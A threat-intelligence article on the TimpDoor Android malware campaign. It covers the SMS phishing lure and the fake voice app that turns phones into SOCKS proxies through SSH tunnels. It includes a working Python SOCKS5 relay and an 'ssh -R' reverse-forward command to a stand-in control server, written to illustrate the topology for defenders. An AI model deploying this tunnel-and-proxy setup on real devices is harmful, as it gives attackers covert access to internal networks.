Researchers have discovered a new, active phishing campaign that targets Android devices in order to turn them into mobile proxies. The campaign spreads Android/TimpDoor, a malicious APK disguised as a voice application, via text messages that carry a link to the fake app. The campaign is believed to have been active since the end of March.

Victims receive a text message saying that they have two messages to review, but that they must click a link to do so. The link leads to a fake web page that impersonates a "popular classified advertisement website" and urges the victim to install the app. Because the APK is not distributed through Google Play, the page includes step-by-step instructions for allowing installation from "Unknown Sources," a setting Android leaves off by default precisely to block this kind of sideloading.

Once installed, the app appears to be a basic voice application; it has no functionality beyond hosting a few fake audio files. When the app is closed, it hides its icon, and a background process starts setting up the proxy and collecting information about the device. According to the researchers, "Once the device information is collected, TimpDoor starts a secure shell (SSH) connection to the control server to get the assigned remote port by sending the device ID; this port will be later used for remote port forwarding with the compromised device acting as a local Socks proxy server." The operator's traffic is therefore carried over an encrypted SSH tunnel and exits from the infected phone. Since that traffic originates from inside the network over an outbound connection the phone itself initiated, it gives the operator a potential route into the internal network the phone is attached to and bypasses perimeter security controls that only inspect inbound connections.

Twenty-six TimpDoor variants have been observed so far, but researchers believe the malware still needs work before it can become a wider threat.
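To make the proxy topology concrete, here is an added example (not TimpDoor's code and not the researchers' code) that reduces it to its two moving parts: a SOCKS5 listener bound to the device's loopback, and an SSH remote port forward that lets the control server hand connections on the assigned port back to that listener. Everything about the protocol details is an assumption, since the article does not say how the listener authenticates or how the tunnel is configured; the hypothetical C2 name `c2.example.invalid`, the port 30000, and the loopback echo server standing in for an internal host are all constructed for the demo.

```python
"""Added example (not TimpDoor's or McAfee's code): the reverse-proxy topology
described above, reduced to two parts.

  operator --> C2:<assigned port> ==SSH -R tunnel==> phone:127.0.0.1:1080 (SOCKS5)
                                                       \--> any host the phone can reach

Assumptions, not from the article: the on-device listener speaks SOCKS5 with
no authentication, and the tunnel is an ordinary `ssh -R` remote forward."""
import select
import socket
import struct
import threading


def reverse_forward_args(c2_host, assigned_port, local_socks_port=1080):
    """SSH invocation equivalent to the device side: once the C2 assigns a port, ask
    it to listen there and forward each incoming connection back to the local SOCKS port."""
    return ["ssh", "-N", "-R", f"{assigned_port}:127.0.0.1:{local_socks_port}", c2_host]


def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed mid-message")
        buf += chunk
    return buf


def read_connect_request(sock):
    """Read a SOCKS5 CONNECT request (RFC 1928 section 4); returns (host, port)."""
    ver, cmd, _rsv, atyp = recv_exact(sock, 4)
    if ver != 5 or cmd != 1:
        raise ValueError("only SOCKS5 CONNECT is supported")
    if atyp == 1:                                   # IPv4
        host = socket.inet_ntoa(recv_exact(sock, 4))
    elif atyp == 3:                                 # length-prefixed domain name
        host = recv_exact(sock, recv_exact(sock, 1)[0]).decode()
    else:                                           # IPv6 omitted for brevity
        raise ValueError("address type not supported")
    return host, struct.unpack("!H", recv_exact(sock, 2))[0]


def pump(a, b):
    """Relay bytes both ways until either side closes."""
    while True:
        for s in select.select([a, b], [], [])[0]:
            data = s.recv(4096)
            if not data:
                return
            (b if s is a else a).sendall(data)


def handle_client(client):
    upstream = None
    try:
        ver, nmethods = recv_exact(client, 2)
        if ver != 5 or 0 not in recv_exact(client, nmethods):   # 0x00 = NO AUTHENTICATION
            client.sendall(b"\x05\xff")
            return
        client.sendall(b"\x05\x00")
        host, port = read_connect_request(client)
        try:
            upstream = socket.create_connection((host, port), timeout=5)
        except OSError:
            client.sendall(b"\x05\x04\x00\x01" + bytes(6))      # REP 0x04: host unreachable
            return
        client.sendall(b"\x05\x00\x00\x01" + bytes(6))          # REP 0x00: succeeded, BND 0.0.0.0:0
        pump(client, upstream)
    except (OSError, ValueError):
        pass
    finally:
        client.close()
        if upstream:
            upstream.close()


def serve(handler, port=0):
    """Bind 127.0.0.1:<port> and dispatch each connection to handler in a daemon thread."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", port))
    srv.listen(16)

    def loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=handler, args=(conn,), daemon=True).start()
    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]


def start_socks_server(port=0):
    return serve(handle_client, port)


def start_echo_server(port=0):
    """Constructed stand-in for an internal host reachable only from the phone's network."""
    def echo(conn):
        with conn:
            while data := conn.recv(4096):
                conn.sendall(data)
    return serve(echo, port)


def socks_connect(proxy_port, host, port):
    """Client side of the handshake: what the operator's tooling does through the tunnel."""
    s = socket.create_connection(("127.0.0.1", proxy_port), timeout=5)
    s.sendall(b"\x05\x01\x00")                                  # greeting: offer NO AUTH only
    if recv_exact(s, 2) != b"\x05\x00":
        raise ConnectionError("proxy rejected our auth method")
    s.sendall(b"\x05\x01\x00\x03" + bytes([len(host)]) + host.encode() + struct.pack("!H", port))
    rep = recv_exact(s, 4)
    if rep[1] != 0:
        raise ConnectionError(f"CONNECT refused, REP=0x{rep[1]:02x}")
    bnd_len = {1: 4, 4: 16}.get(rep[3]) or recv_exact(s, 1)[0]  # atyp 3 is length-prefixed
    recv_exact(s, bnd_len + 2)                                   # discard BND.ADDR + BND.PORT
    return s


def proxied_round_trip(proxy_port, target_port, payload):
    """Send payload to 127.0.0.1:target_port through the SOCKS proxy; return the echo."""
    with socks_connect(proxy_port, "127.0.0.1", target_port) as s:
        s.sendall(payload)
        return recv_exact(s, len(payload))


if __name__ == "__main__":
    echo_port, socks_port = start_echo_server(), start_socks_server()
    print(" ".join(reverse_forward_args("c2.example.invalid", 30000, socks_port)))
    print(proxied_round_trip(socks_port, echo_port, b"hello through the phone"))
```

Run stand-alone, the script starts the echo "internal host" and the SOCKS listener on loopback, prints the `ssh -R` command the device side would need, and pushes a payload through the proxy. The point for defenders is in the topology, not the code: every connection the operator makes looks, from the internal network's side, like ordinary outbound traffic from the phone, and the only externally visible artifact is one long-lived outbound SSH session from a mobile device to the control server.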
Written by: Nataliia Zdrok, Threat Intelligence Analyst at Binary Defense

Russia's invasion of Ukraine increased